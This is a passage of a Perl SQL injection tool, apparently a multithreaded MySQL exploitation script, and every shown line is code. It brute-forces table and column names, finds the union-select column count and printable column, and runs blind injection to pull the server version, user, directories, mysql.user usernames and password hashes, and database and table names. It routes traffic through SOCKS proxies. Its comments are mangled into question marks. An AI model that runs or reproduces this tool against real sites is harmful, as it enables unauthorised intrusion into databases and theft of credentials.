1390.                $url25 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $num . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $current1 . $limit . $filtr;
1391.                $current = $url25;
1392.                $content = scan_url();
1393.                if ($content =~ m/ussr(.*?)ussr/img) {
1394.                     print "   ---> " . $current1 . "\n";
1395.                     print FILE1 "  "  . $current1 . "\n";
1396.                }
1397.                print $num . "\r";
1398.                sleep $pause;
1399.  
1400.             }
1401.        }
1402.        print "----------\n";
1403.        print "Saved in " . "z_" . $host . ".txt\n";
1404.        close(FILE1);
1405.        goto START1;
1406.    }
1407.    if ($choice == 2) {
1408.          open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
1409.          print "   Brute columns\n";
1410.          print "   -------------\n";
1411.          print FILE1 "   Brute columns\n";
1412.          print FILE1 "   -------------\n";
1413.          print "Enter the table_name for brute: \n";
1414.          $choice = <STDIN>;
1415.          chomp $choice;
1416.          if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
1417.          $table = $choice;
1418.          print "Brute columns for table [ " . $table . " ]\n";
1419.          print "-------------\n";
1420.          print "   Check table exist: ";
1421.          $url20 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,$table)" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
1422.          $current = $url20;
1423.          $content = scan_url();
1424.          $ver =$content;
1425.          $ver =~ m/ussr(.*?)ussr/img;
1426.          $ver = $1;
1427.          if ($ver) {
1428.              print " Ok \n";
1429.          } else {
1430.              print " No such table... \n";
1431.              goto START1;
1432.          }
1433.          open(FILE, "<", $source_column_list);
1434.          while(<FILE>) {
1435.             chomp;
1436.             push(@columns4, $_);
1437.          }
1438.          close(FILE);
1439.        print "Add prefix for brute columns? ( for example - PHPBB_ ) (1/0): ";
1440.        $choice = <STDIN>;
1441.        chomp $choice;
1442.        if ($choice == 1) {
1443.               print "Enter your prefix for brute columns: ";
1444.               $choice = <STDIN>;
1445.               chomp $choice;
1446.               $pref_brute = $choice;
1447.        } else {
1448.               $pref_brute = "";
1449.        }
1450.          $size = 0;
1451.          $size = @columns4;
1452.          print "-------------\n";
1453.          print "File: $source_column_list\n";
1454.          print "Columns: $size\n";
1455.          print "-------------\n";
1456.          print "Request method - $method\n";
1457.          print "Threads - $kol_threads\n";
1458.          print "Proxy - $proxy_message\n";
1459.          print "----------------------\n";
1460.          $thr = $kol_threads; # ???-?? ???????
1461.        $num = -1; # ?? ????????
1462.        for(0..$thr) {
1463.             $trl[$_] = threads->create(\&gets7);
1464.        }
1465.        for(0..$thr) {
1466.             $trl[$_]->join;
1467.        }
1468.        sub gets7 {
1469.             $| = 1;
1470.             while ($num<$size) {
1471.                { lock($num);
1472.                $num++; }
1473.                $current1 = $pref_brute . $columns4[$num];
1474.                $url26 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $current1 . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $table . $limit . $filtr;
1475.                $current = $url26;
1476.                $content = scan_url();
1477.                if ($content =~ m/ussr(.*?)ussr/img) {
1478.                     print "   ---> " . $current1 . "\n";
1479.                     print FILE1 "  "  . $current1 . "\n";
1480.                }
1481.                print $num . "\r";
1482.                sleep $pause;
1483.  
1484.             }
1485.        }
1486.        print "----------\n";
1487.        print "Saved in " . "z_" . $host . ".txt\n";
1488.        close(FILE1);
1489.        goto START1;
1490.    }
1491.    if ($choice == 3) {
1492.        goto START_global;
1493.    }
1494. }
1495. if ($choice == 9) {
1496.   if ($source_sql_c =~ m/^https:\/\/?([^\/]+)/i) {
1497.      $host5 = $1;
1498.      $https_flag = 1;
1499.      print "----------------------\n";
1500.      print "HTTPS mode enabled\n";
1501.      print "----------------------\n";
1502.   }
1503.   $host = $host5;
1504. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
1505.     print "-----------------------------------------\n";
1506.     print "Authorization required, wait please....";
1507.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
1508.     $ck1 = collect($answ1);
1509.     $https_auth_check = 1;
1510.     print " DONE\n";
1511.     print "-----------------------------------------\n";
1512. }
1513.   if ($use_socks == 1 && $socks_check == 0) {
1514.   $check_url = $host;
1515.   our $query = "GET / HTTP/1.$http_protocol\r\n"
1516.            . "Host: $check_host\r\n"
1517.            . "Referer: http://" . $check_url . "\r\n"
1518.            . "Accept: */*\r\n"
1519.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
1520.            . "Connection: close\r\n\r\n";
1521.    print "----------------------------------------\n";
1522.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
1523.    print "Timeout = 5 sec:\n";
1524.    print "----------------------------------------\n";
1525.    $socks_check = 0;
1526.    $check_socks = socks_check();
1527.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
1528.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
1529.   if ($current_proxy_host) {
1530.      $socks_check = 1;
1531.      print "Will use --> $proxy_message\n";
1532.   } else {
1533.      $socks_check = 0;
1534.      $proxy_message = "No";
1535.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
1536.   }
1537. }
1538.   open( FILE1, ">>" . "z_" . $host5. ".txt"); # ???? ??? ?????? ???????????
1539.   if ($sql_mess_type == 0) {
1540.       $mess_type = "When wrong";
1541.   } else {
1542.       $mess_type = "When right";
1543.  
1544.   }
1545.   ## ?????????? ?????? ???????? ??????? ??? ?????? ##
1546.   print "Threads - $kol_threads\n";
1547.   print "Method - $method\n";
1548.   print "Mysql inj URL - ". $source_sql_c . $plus_c . "union" . $plus_c . "select...." . $filtr_c .   "\n";
1549.   print "Message - [" . $sql_mess .  "]\n";
1550.   print "Message type - [" . $mess_type .  "]\n";
1551.   print "--------------------------------------\n";
1552.   print "Check first 20 columns - no limit\n";
1553.   print "--------------------------------------\n";
1554.  
1555.   $current_column_start = 1;
1556.   $current_column_number = 20;
1557.   $current_column_limit = "";
1558.               %aa = ();
1559.               $c_number = 0;
1560.               $good_url = "";
1561.               $aa = gets5000();
1562.               $data1 = "";
1563.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
1564.               ($good_url,$c_number) = split(/\|\|/,$data1);
1565.               if ($good_url) {
1566.                   print "---------------------------\n";
1567.                   print "Column number = " . $c_number . "\n";
1568.                   print "URL - " . $good_url . "\n";
1569.                   print FILE1 "------------------\n";
1570.                   print FILE1 "Number of columns:" . $c_number . "\n";
1571.                   print FILE1 "------------------\n";
1572.                   print FILE1 $good_url . "\n";
1573.                   goto PRINTABLE_COLUMN;
1574.               }
1575.   #############################################################
1576.  ## ?????????? ?????? ???????? ??????? limit+0,1 ##
1577.   print "--------------------------------------\n";
1578.   print "Check first 20 columns - limit" . $plus_c . "0,1\n";
1579.   print "--------------------------------------\n";
1580.  
1581.   $current_column_start = 1;
1582.   $current_column_number = 20;
1583.   $current_column_limit = "0,1";
1584.               %aa = ();
1585.               $c_number = 0;
1586.               $good_url = "";
1587.               $aa = gets5000();
1588.               $data1 = "";
1589.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
1590.               ($good_url,$c_number) = split(/\|\|/,$data1);
1591.               if ($good_url) {
1592.                   print "---------------------------\n";
1593.                   print "Column number = " . $c_number . "\n";
1594.                   print "URL - " . $good_url . "\n";
1595.                   print FILE1 "------------------\n";
1596.                   print FILE1 "Number of columns:" . $c_number . "\n";
1597.                   print FILE1 "------------------\n";
1598.                   print FILE1 $good_url . "\n";
1599.                   goto PRINTABLE_COLUMN;
1600.               }
1601.   #############################################################
1602.   ## ?????????? ?????? ???????? ??????? limit+1,1 ##
1603.   print "--------------------------------------\n";
1604.   print "Check first 20 columns - limit" . $plus_c . "1,1\n";
1605.   print "--------------------------------------\n";
1606.  
1607.   $current_column_start = 1;
1608.   $current_column_number = 20;
1609.   $current_column_limit = "1,1";
1610.               %aa = ();
1611.               $c_number = 0;
1612.               $good_url = "";
1613.               $aa = gets5000();
1614.               $data1 = "";
1615.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
1616.               ($good_url,$c_number) = split(/\|\|/,$data1);
1617.               if ($good_url) {
1618.                   print "---------------------------\n";
1619.                   print "Column number = " . $c_number . "\n";
1620.                   print "URL - " . $good_url . "\n";
1621.                   print FILE1 "------------------\n";
1622.                   print FILE1 "Number of columns:" . $c_number . "\n";
1623.                   print FILE1 "------------------\n";
1624.                   print FILE1 $good_url . "\n";
1625.                   goto PRINTABLE_COLUMN;
1626.               }
1627.   #################################################################
1628.   ## ?????????? ??????? ? 21 ?? sql_max_column_number ??? ?????? ##
1629.   print "--------------------------------------\n";
1630.   print "Check columns from 21 to $sql_max_column_number - no limit\n";
1631.   print "--------------------------------------\n";
1632.  
1633.   $current_column_start = 21;
1634.   $current_column_number = $sql_max_column_number;
1635.   $current_column_limit = "";
1636.               %aa = ();
1637.               $c_number = 0;
1638.               $good_url = "";
1639.               $aa = gets5000();
1640.               $data1 = "";
1641.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
1642.               ($good_url,$c_number) = split(/\|\|/,$data1);
1643.               if ($good_url) {
1644.                   print "---------------------------\n";
1645.                   print "Column number = " . $c_number . "\n";
1646.                   print "URL - " . $good_url . "\n";
1647.                   print FILE1 "------------------\n";
1648.                   print FILE1 "Number of columns:" . $c_number . "\n";
1649.                   print FILE1 "------------------\n";
1650.                   print FILE1 $good_url . "\n";
1651.                   goto PRINTABLE_COLUMN;
1652.               }
1653.   ################################################################
1654.   ## ?????????? ??????? ? 21 ?? sql_max_column_number limit+0,1 ##
1655.   print "--------------------------------------\n";
1656.   print "Check columns from 21 to $sql_max_column_number  - limit" . $plus_c . "0,1\n";
1657.   print "--------------------------------------\n";
1658.  
1659.   $current_column_start = 21;
1660.   $current_column_number = $sql_max_column_number;
1661.   $current_column_limit = "0,1";
1662.               %aa = ();
1663.               $c_number = 0;
1664.               $good_url = "";
1665.               $aa = gets5000();
1666.               $data1 = "";
1667.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
1668.               ($good_url,$c_number) = split(/\|\|/,$data1);
1669.               if ($good_url) {
1670.                   print "---------------------------\n";
1671.                   print "Column number = " . $c_number . "\n";
1672.                   print "URL - " . $good_url . "\n";
1673.                   print FILE1 "------------------\n";
1674.                   print FILE1 "Number of columns:" . $c_number . "\n";
1675.                   print FILE1 "------------------\n";
1676.                   print FILE1 $good_url . "\n";
1677.                   goto PRINTABLE_COLUMN;
1678.               }
1679.   ################################################################
1680.   ## ?????????? ??????? ? 21 ?? sql_max_column_number limit+1,1 ##
1681.   print "--------------------------------------\n";
1682.   print "Check columns from 21 to $sql_max_column_number  - limit" . $plus_c . "1,1\n";
1683.   print "--------------------------------------\n";
1684.  
1685.   $current_column_start = 21;
1686.   $current_column_number = $sql_max_column_number;
1687.   $current_column_limit = "1,1";
1688.               %aa = ();
1689.               $c_number = 0;
1690.               $good_url = "";
1691.               $aa = gets5000();
1692.               $data1 = "";
1693.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
1694.               ($good_url,$c_number) = split(/\|\|/,$data1);
1695.               if ($good_url) {
1696.                   print "---------------------------\n";
1697.                   print "Column number = " . $c_number . "\n";
1698.                   print "URL - " . $good_url . "\n";
1699.                   print FILE1 "------------------\n";
1700.                   print FILE1 "Number of columns:" . $c_number . "\n";
1701.                   print FILE1 "------------------\n";
1702.                   print FILE1 $good_url . "\n";
1703.                   goto PRINTABLE_COLUMN;
1704.               }
1705.   #############################################################
1706.   sub gets5000 {
1707.                    $ii = 0;
1708.                    $i = $current_column_start;
1709.                    $union = "";
1710.                    $size = 0;
1711.                    while($i <= $current_column_number) {
1712.                     if ($current_column_start < 21) {
1713.                       if($i == 1) {
1714.                          $union=$i;
1715.                       } else {
1716.                          $union = $union . "," . $i;
1717.                       }
1718.                     } else {
1719.                          if($current_column_start == 21) {
1720.                              $union = $union . "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21";
1721.                              $current_column_start = 0;
1722.                          } else {
1723.                              $union = $union . "," . $i;
1724.                          }
1725.                     }
1726.                       if ($current_column_limit) {
1727.                         $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $plus_c . "limit" . $plus_c . $current_column_limit . $filtr_c;
1728.                       } else {
1729.                         $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $filtr_c;
1730.                       }
1731.                       push(@columns_brute, $current11);
1732.                       push(@columns_brute_n, $i);
1733.                       $i++;
1734.                    }
1735.                    $size = @columns_brute;
1736.                    %res = ();
1737.                    $thr502 = $kol_threads; # ???-?? ???????
1738.                    $num = -1; # ?? ????????
1739.                    for(0..$thr502) {
1740.                       $thr502[$_] = threads->create(\&gets502);
1741.                    }
1742.                    for(0..$thr502) {
1743.                       %res = (%res, %{$thr502[$_]->join});
1744.                    }
1745.                    sub gets502 {
1746.                             $| = 1;
1747.                             %hash = ();
1748.                             while ($num < $size) {
1749.                                   { lock($num);
1750.                                   $num++; }
1751.                                   $ii = $num;
1752.                                   if ($ii < $size) {
1753.                                      $current10 = $columns_brute[$num];
1754.                                      $nom = $columns_brute_n[$num];
1755.                                      $column_brute_flag = column_check();
1756.                                      if ($column_brute_flag == 1) {
1757.                                          $hash{$ii} = $current10 . "||" . $nom;
1758.                                          $ii = $size;
1759.                                          break;
1760.                                          return \%hash;
1761.                                      }
1762.                                   }
1763.                                   print $num . "\r";
1764.                                   sleep $pause;
1765.                             }
1766.                    }
1767.                    return \%res;
1768.             }
1769.  print "----------\n";
1770.  print "Can't find column number...\n";
1771.  close(FILE1);
1772.  goto START;
1773.  #################################################################
1774.  PRINTABLE_COLUMN:
1775.   print "--------------------------------------\n";
1776.   print "Searching printable column - no limit\n";
1777.   print "--------------------------------------\n";
1778.   if (!$current_column_limit) {
1779.         $current_column_limit= "";
1780.   } else {
1781.       if ($current_column_limit == "0,1") {goto LIMIT0;}
1782.       if ($current_column_limit == "1,1") {goto LIMIT1;}
1783.   }
1784.               %aa = ();
1785.               $print_col = 0;
1786.               $good_url = "";
1787.               $aa = gets6000();
1788.               $data1 = "";
1789.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
1790.               ($print_col,$good_url) = split(/\|\|/,$data1);
1791.               if ($print_col) {
1792.                   print "---------------------------\n";
1793.                   print "Printable column = " . $print_col . "\n";
1794.                   print "Right url - " . $good_url . "\n";
1795.                   print FILE1 "------------------\n";
1796.                   print FILE1 "Printable column:" . $print_col . "\n";
1797.                   print FILE1 "------------------\n";
1798.                   print FILE1 $good_url . "\n";
1799.                   print "----------\n";
1800.                   print "Saved in " . "z_" . $host5. ".txt\n";
1801.                   close(FILE1);
1802.                   goto START;
1803.               }
1804.   #############################################################
1805.   LIMIT0:
1806.   print "--------------------------------------\n";
1807.   print "Searching printable column - limit" . $plus_c . "0,1\n";
1808.   print "--------------------------------------\n";
1809.   $current_column_limit = "0,1";
1810.               %aa = ();
1811.               $print_col = 0;
1812.               $good_url = "";
1813.               $aa = gets6000();
1814.               $data1 = "";
1815.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
1816.               ($print_col,$good_url) = split(/\|\|/,$data1);
1817.               if ($print_col) {
1818.                   print "---------------------------\n";
1819.                   print "Printable column = " . $print_col . "\n";
1820.                   print "Right url - " . $good_url . "\n";
1821.                   print FILE1 "------------------\n";
1822.                   print FILE1 "Printable column:" . $print_col . "\n";
1823.                   print FILE1 "------------------\n";
1824.                   print FILE1 $good_url . "\n";
1825.                   print "----------\n";
1826.                   print "Saved in " . "z_" . $host5. ".txt\n";
1827.                   close(FILE1);
1828.                   goto START;
1829.               }
1830.   #############################################################
1831.   LIMIT1:
1832.   print "--------------------------------------\n";
1833.   print "Searching printable column - limit" . $plus_c . "1,1\n";
1834.   print "--------------------------------------\n";
1835.   $current_column_limit = "1,1";
1836.               %aa = ();
1837.               $print_col = 0;
1838.               $good_url = "";
1839.               $aa = gets6000();
1840.               $data1 = "";
1841.               $data1 = $aa->{$_},for sort {$a <=> $b} keys %$aa;
1842.               ($print_col,$good_url) = split(/\|\|/,$data1);
1843.               if ($print_col) {
1844.                   print "---------------------------\n";
1845.                   print "Printable column = " . $print_col . "\n";
1846.                   print "Right url - " . $good_url . "\n";
1847.                   print FILE1 "------------------\n";
1848.                   print FILE1 "Printable column:" . $print_col . "\n";
1849.                   print FILE1 "------------------\n";
1850.                   print FILE1 $good_url . "\n";
1851.                   print "----------\n";
1852.                   print "Saved in " . "z_" . $host5. ".txt\n";
1853.                   close(FILE1);
1854.                   goto START;
1855.               }
1856.  #############################################################
1857.  sub gets6000 {
1858.       $union = "";
1859.       $current = "";
1860.       $host = $host5;
1861.       for($i=1; $i <= $c_number; $i++) {
1862.          for($j=1; $j <= $c_number; $j++) {
1863.            $temp = $sql_pref1 . $i . $sql_pref2;
1864.            if($j==1){if($j==$i){$union=$temp}else{$union=$j}}
1865.            elsif($j==$i){$union=$union.",".$temp}
1866.            else{$union=$union.",".$j;}
1867.          }
1868.          if ($current_column_limit) {
1869.             $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $plus_c . "limit" . $plus_c . $current_column_limit . $filtr_c;
1870.          } else {
1871.             $current11 = $source_sql_c . $plus_c . "union" . $plus_c . "select" . $plus_c . $union . $filtr_c;
1872.          }
1873.          push(@columns_print, $current11);
1874.          push(@columns_print_n, $i);
1875.       }
1876.       $size = @columns_print;
1877.       %res = ();
1878.       $thr509 = $kol_threads; # ???-?? ???????
1879.       $num = -1; # ?? ????????
1880.       $ii = 0;
1881.       for(0..$thr509) {
1882.           $thr509[$_] = threads->create(\&gets509);
1883.       }
1884.       for(0..$thr509) {
1885.           %res = (%res, %{$thr509[$_]->join});
1886.       }
1887.       sub gets509 {
1888.               $| = 1;
1889.               %hash = ();
1890.               while ($num < $size) {
1891.                     { lock($num);
1892.                     $num++; }
1893.                     $ii = $num;
1894.                     $current = $columns_print[$num];
1895.                     $nom = $columns_print_n[$num];
1896.                     if ($ii < $size) {
1897.                        $content = scan_url();
1898.                        if ($content =~ m/ussr(.*?)ussr/img) {
1899.                               $hash{$ii} = $nom . "||" . $current;
1900.                               $ii = $size;
1901.                               break;
1902.                               return \%hash;
1903.                        }
1904.                     }
1905.                     print $num . "\r";
1906.                     sleep $pause;
1907.               }
1908.       }
1909.       return \%res;
1910.  }
1911.  print "----------\n";
1912.  print "Can't find printable column...\n";
1913.  close(FILE1);
1914.  goto START;
1915. }
1916. ## Mysql blind ##
1917. if ($choice == 10) {
1918. if ($bl_url =~ m/^https:\/\/?([^\/]+)/i) {
1919.    $host3 = $1;
1920.    $https_flag = 1;
1921.    print "----------------------\n";
1922.    print "HTTPS mode enabled\n";
1923.    print "----------------------\n";
1924. }
1925. $host = $host3;
1926. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
1927.     print "-----------------------------------------\n";
1928.     print "Authorization required, wait please....";
1929.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
1930.     $ck1 = collect($answ1);
1931.     $https_auth_check = 1;
1932.     print " DONE\n";
1933.     print "-----------------------------------------\n";
1934. }
1935.    print $host . "\n";
1936. if ($use_socks == 1 && $socks_check == 0) {
1937.   $check_url = $host;
1938.   our $query = "GET / HTTP/1.$http_protocol\r\n"
1939.            . "Host: $check_host\r\n"
1940.            . "Referer: http://" . $check_url . "\r\n"
1941.            . "Accept: */*\r\n"
1942.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
1943.            . "Connection: close\r\n\r\n";
1944.    print "----------------------------------------\n";
1945.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
1946.    print "Timeout = 5 sec:\n";
1947.    print "----------------------------------------\n";
1948.    $socks_check = 0;
1949.    $check_socks = socks_check();
1950.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
1951.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
1952.   if ($current_proxy_host) {
1953.      $socks_check = 1;
1954.      print "Will use --> $proxy_message\n";
1955.   } else {
1956.      $socks_check = 0;
1957.      $proxy_message = "No";
1958.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
1959.   }
1960. }
1961.    START10:
1962.    $schema_flag = 0;
1963.    print "-----------------------------------------\n";
1964.    print "Choose mode:\n";
1965.    print "----------\n";
1966.    print "    [1]  Blind System information\n";
1967.    print "    [2]  Blind inj get DB-names from information_schema.schemata\n";
1968.    print "    [3]  Blind inj get tables from DB-name\n";
1969.    print "    [4]  <<< Blind ANY QUERY >>>\n";
1970.    print "    [5]  Blind inj get column_name from tables from DB-name\n";
1971.    print "    [6]  Blind inj get LOAD_FILE (file_priv = Y)\n";
1972.    print "    [7]  Blind BRUTE LOAD_FILE log/conf files (file_priv = Y)\n";
1973.    print "    [8]  Blind Get tables from information_schema (current DB)\n";
1974.    print "    [9]  Blind Get column_name from table (current DB)\n";
1975.    print "    [10] Blind Get data from columns\n";
1976.    print "    [11] Blind Brute MySql4 for tables & columns\n";
1977.    print "    [12] Main menu\n";
1978.    print "----------\n";
1979.    $choice = <STDIN>;
1980.    chomp $choice;
1981.    print "Your choice: $choice\n";
1982.    if ($choice==1) {
1983.    open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
1984.    print FILE1 "----------------------------------\n";
1985.    print FILE1 "Blind MYsql system information:\n";
1986.    print FILE1 "----------------------------------\n";
1987.    # ?????? ?????? #
1988.    $url1 = "version()";
1989.    # ?????? ??? ???? #
1990.    $url2 = "database()";
1991.    # ?????? ????? #
1992.    $url3 = "user()";
1993.    # ?????? @@basedir #
1994.    $url4 = "@@" . "basedir";
1995.    # ?????? @@datadir #
1996.    $url5 = "@@" . "datadir";
1997.    # ?????? @@tmpdir #
1998.    $url6 = "@@" . "tmpdir";
1999.    # ?????? @@version_compile_os #
2000.    $url7 = "@@" . "version_compile_os";
2001.    # ?????? mysql.user #
2002.    $url8 = "user" . $bl_plus . "from" . $bl_plus . "mysql.user";
2003.    # ?????? mysql.password #
2004.    $url9 = "password" . $bl_plus . "from" . $bl_plus . "mysql.user";
2005.    # ?????? file_priv #
2006.    $url10 = "file_priv" . $bl_plus ."from" . $bl_plus . "mysql.user" . $bl_plus . "where" . $bl_plus . "user=user";
2007.    ####################
2008.    $thr = $kol_threads; # ???-?? ???????
2009.    $num = -1; # ?? ????????
2010.    $bl_lenght = "";
2011.    $ii = 0;
2012.    $mflag = 0;
2013.    print "-----------------------------------\n";
2014.    print "Request method - $method\n";
2015.    print "Threads - $kol_threads\n";
2016.    print "Proxy - $proxy_message\n";
2017.    print "----------------------\n";
2018.    $time = localtime;
2019.    print $time . "\n";
2020.    print "-----------------------------------\n";
2021.    @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url0);
2022.    $size = @array; #???????? ?????? ???????
2023.    for(0..$thr) {
2024.          $trl[$_] = threads->create(\&gets101);
2025.    }
2026.    for(0..$thr) {
2027.          $trl[$_]->join;
2028.    }
2029.    sub gets101 {
2030.         $| = 1;
2031.         while ($num < $size) {
2032.             { lock($num);
2033.             $num++; }
2034.             $bl_current = $array[$num];
2035.             if ($bl_mode==0) {
2036.                    $bl_lenght = len_check();
2037.             } else {
2038.                    $bl_lenght = len_check1();
2039.             }
2040.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2041.                  print $bl_current . " [length]:" .  $bl_lenght . "\n";
2042.                 if ($mflag == 1) {
2043.                      ############################################################
2044.                      %aa = ();
2045.                      $aa = gets1000();
2046.                      $data1 = "";
2047.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
2048.                      #############################################################
2049.                  } else {
2050.                    $data1 = "";
2051.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2052.                     if ($bl_mode==0) {
2053.                          $data1 .= chr(get_res_normal());
2054.                     } else {
2055.                          $data1 .= chr(get_res_normal1());
2056.                     }
2057.                       print $data1 . "\r";
2058.                    }
2059.                  }
2060.                  print "\n------------------------------------------------------\n";
2061.                  print "---> " . $bl_current . ": " . $data1 . "\n";
2062.                  print "------------------------------------------------------\n";
2063.                  print FILE1 $bl_current . ": " . $data1 . "\n";
2064.             }
2065.             $oo++;
2066.             sleep $pause;
2067.         }
2068.    }
2069.    $time = localtime;
2070.    print "\n" . $time . "\n";
2071.      print "----------\n";
2072.      print "Saved in " . "z_" . $host3 . ".txt\n";
2073.      close(FILE1);
2074.      goto START10;
2075. }
2076. # Blind db names
2077. if ($choice==2) {
2078.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
2079.      print "-----------------------------------\n";
2080.      ## ???????? ##
2081.      $bl_lenght = "";
2082.      $ii = 0;
2083.      $bl_current = "(select" . $bl_plus .  "count(schema_name)" . $bl_plus . "from" . $bl_plus . "information_schema.schemata)";
2084.      if ($bl_mode==0) {
2085.             $bl_lenght = len_check();
2086.      } else {
2087.             $bl_lenght = len_check1();
2088.      }
2089.      if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2090.           print "Count DB in information_schema.schemata  [length]:" .  $bl_lenght . "\n";
2091.           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2092.                if ($bl_mode==0) {
2093.                    $bl_table_number_NIS .= get_res_count();
2094.                } else {
2095.                    $bl_table_number_NIS .= get_res_count1();
2096.                }
2097.                 print $bl_table_number_NIS . "\r";
2098.                 sleep $pause;
2099.           }
2100.           print "\n------------------------------------------------------\n";
2101.           print "Count DB in information_schema.schemata [value]:" . $bl_table_number_NIS . "\n";
2102.           print "--------------------------------------------------------\n";
2103.      } else {
2104.           print "\n------------------------------------------------------\n";
2105.           print "Cant't get data...\n";
2106.           print "------------------------------------------------------\n";
2107.      }
2108.      $time = localtime;
2109.      print $time . "\n";
2110.      print "-----------------------------------\n";
2111.      ## start from2 ##
2112.      print FILE1  "-----------------------------------------\n";
2113.      print FILE1  "DB in information_schema.schemata - $bl_table_number_NIS\n";
2114.      print FILE1  "-----------------------------------------\n";
2115.      print "Normal MODE - records > 10\n";
2116.      print "Fast MODE - records <= 10\n";
2117.      print "-----------------------------------------\n";
2118.      $thr = $kol_threads; # ???-?? ???????
2119.      $num = -1; # ?? ????????
2120.      ## end from2
2121.      print "Request method - $method\n";
2122.      print "Threads - $kol_threads\n";
2123.      print "Proxy - $proxy_message\n";
2124.      print "----------------------\n";
2125.      TABLES:
2126.      $time = localtime;
2127.      print $time . "\n";
2128.      print "-----------------------------------\n";
2129.      # ?????? DB #
2130.      $bl_lenght = "";
2131.      $ii = 0;
2132.      $s = 0;
2133.      $mflag = 0;
2134.      print "-----------------------------------\n";
2135.      for(0..$thr) {
2136.          $trl[$_] = threads->create(\&gets102111);
2137.      }
2138.      for(0..$thr) {
2139.          $trl[$_]->join;
2140.      }
2141.      sub gets102111 {
2142.         $| = 1;
2143.         while ($num < $bl_table_number_NIS) {
2144.             { lock($num);
2145.             $num++; }
2146.             $sss = $num;
2147.             $bl_current = "(select" . $bl_plus .  "schema_name" . $bl_plus . "from" . $bl_plus . "information_schema.schemata" . $bl_plus . "limit" . $bl_plus . $num . ",1)";
2148.             if ($bl_mode==0) {
2149.                    $bl_lenght = len_check();
2150.             } else {
2151.                    $bl_lenght = len_check1();
2152.             }
2153.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
2154.                  print "\nDB limit $sss,1 [length]:" .  $bl_lenght . "\n";
2155.                  if ($mflag == 1) {
2156.                      ############################################################
2157.                      %aa = ();
2158.                      $aa = gets1000();
2159.                      $data1 = "";
2160.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
2161.                      #############################################################
2162.                  } else {
2163.                    $data1 = "";
2164.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
2165.                     if ($bl_mode==0) {
2166.                          $data1 .= chr(get_res_normal());
2167.                     } else {
2168.                          $data1 .= chr(get_res_normal1());
2169.                     }
2170.                       print $data1 . "\r";
2171.                    }
2172.                  }
2173.                  print "\n-----------------------------------\n";
2174.                  print "  ---> DB limit $sss,1: " . $data1 . "\n";
2175.                  print "-----------------------------------\n";
2176.                  print FILE1 "  ---> DB limit $sss,1: " . $data1 . "\n";
2177.                  $data = "";
2178.             }
2179.             sleep $pause;
2180.         }
2181.     }
2182.     print "----------\n";
2183.     print "Saved in " . "z_" . $host3 . ".txt\n";
2184.     close(FILE1);
2185.     goto START10;
2186. } # end DB names
2187. # Blind tables from DB names
2188. if ($choice==3) {
2189.      open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
2190.      $bl_table_number_NIS = "";
2191.      print "-----------------------------------------\n";
2192.      print "Enter the DB-name: ";
2193.      $choice = <STDIN>;
2194.      chomp $choice;
2195.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
2196.      print "DB-name: $choice\n";
2197.      print "----------\n";
2198.      $choice1 = ascii_to_hex $choice;
2199.      ## ???????? ##
2200.      $bl_lenght = "";
2201.      $ii = 0;
2202.      $bl_current = "(select" . $bl_plus .  "count(table_name)" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_schema=" . $plus . $choice1 . ")";
